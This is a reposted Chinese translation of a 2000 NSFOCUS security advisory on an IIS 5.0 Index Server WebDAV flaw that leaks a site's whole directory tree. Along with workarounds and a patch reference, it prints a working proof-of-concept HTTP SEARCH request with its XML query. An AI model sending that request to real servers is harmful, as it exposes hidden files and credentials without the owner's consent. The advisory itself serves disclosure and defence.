设为首页
联系我们
加入收藏
| 网络工具 | 系统工具 | 应用软件 | 多媒体类 | 联络聊天 | 行业软件 | 图形图像 | 安全相关 | 编程开发 | 教育教学 | 游戏娱乐 |
| 程序源码 | ASP 源码 | CGI 源码 | PHP 源码 | 驱动下载 | 字体下载 | 素材下载 | 桌面大全 | 闪客天地 | 外挂插件 | 考题下载 |

站内搜索:

您的位置:首页-> 资讯中心-> 技术开发-> ASP 学院-> ASP安全-> 微软IIS 5.0泄漏索引目录的漏洞

ASP安全

ASP教程
ASP文摘
ASP实例
ASP FAQ
ASP安全
ASP组件
ASP其它

本类阅读TOP10

·ASP漏洞分析和解决方法(10)
·Asp的安全管理(1)
·以我与“黑客”的一段遭遇简单谈ASP的安全性
·20种看asp源码的方法及工具
·ASP漏洞分析和解决方法(2)
·ASP漏洞分析和解决方法(4)
·ASP程序密码验证问题 (MS,缺陷)
·Asp的安全管理(2)
·ASP原码加密工具介绍
·介绍一种效率极高的分类算法

精品推荐

微软IIS 5.0泄漏索引目录的漏洞

作者:未知 来源:未知 加入时间:2004-12-1

微软IIS 5.0泄漏索引目录的漏洞

发布日期: 2000-10-6

更新日期: 2000-10-6
受影响的系统: Microsoft IIS 5.0
+ Microsoft Windows NT 2000


描述:
--------------------------------------------------------------------------------


如果IIS 5.0中的Index Server被允许的话,远程用户就可能察看整个根目录结构以及所有子目录,这是因为WebDAV的查找实现中存在一个缺陷。隐藏目录、包含文件(*.inc)或其它在正常的网站界面中一般不能存取的文档就会由于这个漏洞而泄漏。
成功地利用这个漏洞就可能找到那些可能包含敏感信息如用户名和密码的特定文件。
默认情况下IIS 5.0中的Index Server是被禁止的,只有设置了“Index”属性的目录才会受到这个漏洞的影响。

<* 来源:David Litchfield <dlitchfield@atstake.com> *>

测试程序:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


发送如下的请求给服务器:
SEARCH / HTTP/1.1
Host: target
Content-Type: text/xml
Content-Length: 133

<?xml version="1.0"?>
<g:searchrequest xmlns:g="DAV:">
<g:sql>
Select "DAV:displayname" from scope()
</g:sql>
</g:searchrequest>

--------------------------------------------------------------------------------
建议:
临时解决办法:

NSFOCUS建议您使用微软提供的解决方案:
如果您没有使用Index Server(比如您的网站中没有需要查找的内容),禁止或卸载该服务。或者将包含敏感信息的目录的“Index this resource”的选项禁止。

厂商补丁:

微软已发布一篇知识库文章详细描述了这个问题的解决方法,可以在如下的位置找到这篇文章:
http://www.microsoft.com/technet/support/kb.asp?ID=272079

中联绿盟翻译整理,未经许可,不得转载
欢迎访问我们的站点http://www.nsfocus.com/
中联绿盟给您安全的保障

(出处:不详 )





相关文章
相关软件